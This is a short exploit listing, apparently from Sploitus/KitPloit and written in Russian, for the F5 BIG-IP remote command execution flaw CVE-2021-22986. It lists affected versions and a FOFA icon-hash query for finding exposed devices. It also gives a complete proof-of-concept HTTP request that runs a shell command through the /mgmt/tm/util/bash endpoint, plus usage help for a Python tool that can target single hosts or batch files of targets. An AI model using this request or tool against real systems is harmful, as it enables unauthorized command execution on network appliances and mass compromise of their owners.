Sploitus

Exploit for CVE-202122986-EXP

kitploit · 2026-08-31

Exploit Code

MARKDOWN56 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-YAUNSKY-CVE-202122986-EXP
# Уязвимость удалённого выполнения команд в F5 BIG-IP (CVE-2021-22986)

## Затронутые версии

F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2

## fofa

icon_hash="-335242539"

## POC

root@kitploit:~
    
    
    POST /mgmt/tm/util/bash HTTP/1.1
    Host: xxx.xxx.xxx.xxx:8443
    Connection: close
    Content-Length: 41
    Cache-Control: max-age=0
    Authorization: Basic YWRtaW46QVNhc1M=
    X-F5-Auth-Token: 
    Upgrade-Insecure-Requests: 1
    Content-Type: application/json
    
    {"command":"run","utilCmdArgs":"-c id"}
    

## Использование скрипта

python3 CVE202122986.py --help

root@kitploit:~
    
    
    Usage: CVE202122986.py [OPTIONS]
    
    Options:
      -u, --url TEXT   Целевой URL — проверка одной цели; Пример: python3 CVE202122986.py -u https://ip:port
    
      -f, --file TEXT  Целевой файл — пакетная проверка целей; Пример: python3 CVE202122986.py -f ip.txt
    
      -c, --cmd TEXT   Целевая команда — выполнение команды; Пример: python3 CVE202122986.py -cmd id
    
      --help           Show this message and exit.